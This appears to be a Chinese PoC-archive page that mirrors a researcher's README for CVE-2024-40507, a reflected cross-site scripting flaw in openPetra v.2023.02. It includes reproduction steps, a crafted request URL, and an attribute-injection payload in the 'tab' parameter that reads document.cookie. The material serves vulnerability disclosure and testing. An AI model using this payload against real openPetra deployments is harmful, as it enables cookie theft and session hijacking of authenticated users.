POC详情: a8518790ee67a1af458875299d0b9f2a5e91758a

来源
https://github.com/Jansen-C-Moreira/CVE-2024-40507
关联漏洞
标题: OpenPetra 安全漏洞 (CVE-2024-40507)
描述:OpenPetra是OpenPetra公司的一个免费的管理软件。 OpenPetra 2023.02版本存在安全漏洞,该漏洞源于serverMPersonnel.asmx函数,可能允许远程攻击者获取敏感信息。
描述
OpenPetra v.2023.02 Use CVE-2024-40507
介绍
# CVE-2024-40507
# Cross Site Scripting vulnerability in openPetra v.2023.02 via the serverMPersonnel.asmx function.

**Description**: An unauthenticated user can steal cookies from authenticated user, by exploiting a XSS in openPetra v.2023.02 via the serverMPersonnel.asmx function.

**Vulnerable Product Version**: openPetra v.2023.02  
**CVE Author**: Jansen Moreira 
**Date**: 13/07/2024  
**CVE**: CVE-2024-40507       
**CVE Link**: https://www.cve.org/CVERecord?id=CVE-2024-40507  
**NVD Link**: https://nvd.nist.gov/vuln/detail/CVE-2024-40507   
**Tenable Link**: https://www.tenable.com/cve/CVE-2024-40507  
**Confirmed on**: 13/07/2024                               
**Tested on**: Linux  
### Steps to reproduce:  
1- Access the home Page  
2- Use the following path and add the xss payload in the tab parametrer. EX.: ```http://target.com/api/serverMPersonnel.asmx?bnd=TMHospitalityWebServiceSoap&op=THospitalityWebConnector_Dummy&page=op&tab=x" onmouseover=alert(document.cookie) x="```                                                 
3- Hover the mouse over the left index item to trigger the XSS  

**Payloads**:  
tab: x" onmouseover=alert(document.cookie) x="


Discoverer(s)/Credits:
Jansen Moreira
文件快照

 [4.0K]  /data/pocs/a8518790ee67a1af458875299d0b9f2a5e91758a
└── [1.2K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。